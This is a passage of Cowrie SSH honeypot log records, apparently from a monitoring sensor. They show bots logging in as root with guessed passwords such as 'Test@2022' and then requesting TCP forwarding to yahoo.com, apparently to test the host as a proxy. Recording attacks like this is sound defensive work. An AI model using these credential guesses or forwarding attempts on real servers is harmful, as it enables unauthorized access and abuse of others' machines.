@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.705916Z","src_ip":"213.209.150.239","session":"1bfb94d3efe1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.783513Z","src_ip":"36.89.28.139","session":"da0841c44da1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.988332Z","src_ip":"213.209.150.239","session":"1bfb94d3efe1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21564,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21564","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.045876Z","session":"1bfb94d3efe1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.102587Z","src_ip":"213.209.150.239","session":"1bfb94d3efe1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17271,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17271","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.259446Z","session":"1bfb94d3efe1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.316514Z","src_ip":"213.209.150.239","session":"1bfb94d3efe1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.373902Z","src_ip":"213.209.150.239","session":"1bfb94d3efe1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51645,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce2dd91a5f5c","protocol":"ssh","message":"New connection: 213.209.150.239:51645 (1.2.3.4:22) [session: ce2dd91a5f5c]","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.429608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.430401Z","src_ip":"213.209.150.239","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.487427Z","src_ip":"213.209.150.239","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.770838Z","src_ip":"213.209.150.239","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":3142,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:3142","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.828336Z","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.885071Z","src_ip":"213.209.150.239","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:18.980556Z","src_ip":"36.89.28.139","session":"da0841c44da1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28086,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28086","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.038957Z","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.095536Z","src_ip":"213.209.150.239","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.152939Z","src_ip":"213.209.150.239","session":"ce2dd91a5f5c"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":49360,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e65fde0ed59","protocol":"ssh","message":"New connection: 36.89.28.139:49360 (1.2.3.4:22) [session: 7e65fde0ed59]","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.180443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.181411Z","src_ip":"36.89.28.139","session":"7e65fde0ed59"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51691,"dst_ip":"1.2.3.4","dst_port":22,"session":"67de817ee74e","protocol":"ssh","message":"New connection: 213.209.150.239:51691 (1.2.3.4:22) [session: 67de817ee74e]","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.199070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.199970Z","src_ip":"213.209.150.239","session":"67de817ee74e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.247015Z","src_ip":"213.209.150.239","session":"67de817ee74e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.381223Z","src_ip":"36.89.28.139","session":"7e65fde0ed59"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.481872Z","src_ip":"213.209.150.239","session":"67de817ee74e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22115,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22115","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.530194Z","session":"67de817ee74e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.578295Z","src_ip":"213.209.150.239","session":"67de817ee74e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15011,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15011","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.713980Z","session":"67de817ee74e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.761302Z","src_ip":"213.209.150.239","session":"67de817ee74e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.809445Z","src_ip":"213.209.150.239","session":"67de817ee74e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51722,"dst_ip":"1.2.3.4","dst_port":22,"session":"309be43019ae","protocol":"ssh","message":"New connection: 213.209.150.239:51722 (1.2.3.4:22) [session: 309be43019ae]","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.865112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.866367Z","src_ip":"213.209.150.239","session":"309be43019ae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:19.922946Z","src_ip":"213.209.150.239","session":"309be43019ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.205050Z","src_ip":"213.209.150.239","session":"309be43019ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26861,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26861","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.262997Z","session":"309be43019ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.319788Z","src_ip":"213.209.150.239","session":"309be43019ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13966,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13966","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.475011Z","session":"309be43019ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.531774Z","src_ip":"213.209.150.239","session":"309be43019ae"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.589301Z","src_ip":"213.209.150.239","session":"309be43019ae"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51784,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf1365fbff42","protocol":"ssh","message":"New connection: 213.209.150.239:51784 (1.2.3.4:22) [session: cf1365fbff42]","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.644984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.646334Z","src_ip":"213.209.150.239","session":"cf1365fbff42"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.702938Z","src_ip":"213.209.150.239","session":"cf1365fbff42"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.775916Z","src_ip":"36.89.28.139","session":"7e65fde0ed59"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:20.985429Z","src_ip":"213.209.150.239","session":"cf1365fbff42"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28395,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28395","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.043142Z","session":"cf1365fbff42"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.099991Z","src_ip":"213.209.150.239","session":"cf1365fbff42"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":474,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:474","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.254910Z","session":"cf1365fbff42"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.311489Z","src_ip":"213.209.150.239","session":"cf1365fbff42"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.368859Z","src_ip":"213.209.150.239","session":"cf1365fbff42"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51834,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf036d84bb86","protocol":"ssh","message":"New connection: 213.209.150.239:51834 (1.2.3.4:22) [session: cf036d84bb86]","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.414954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.415891Z","src_ip":"213.209.150.239","session":"cf036d84bb86"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-g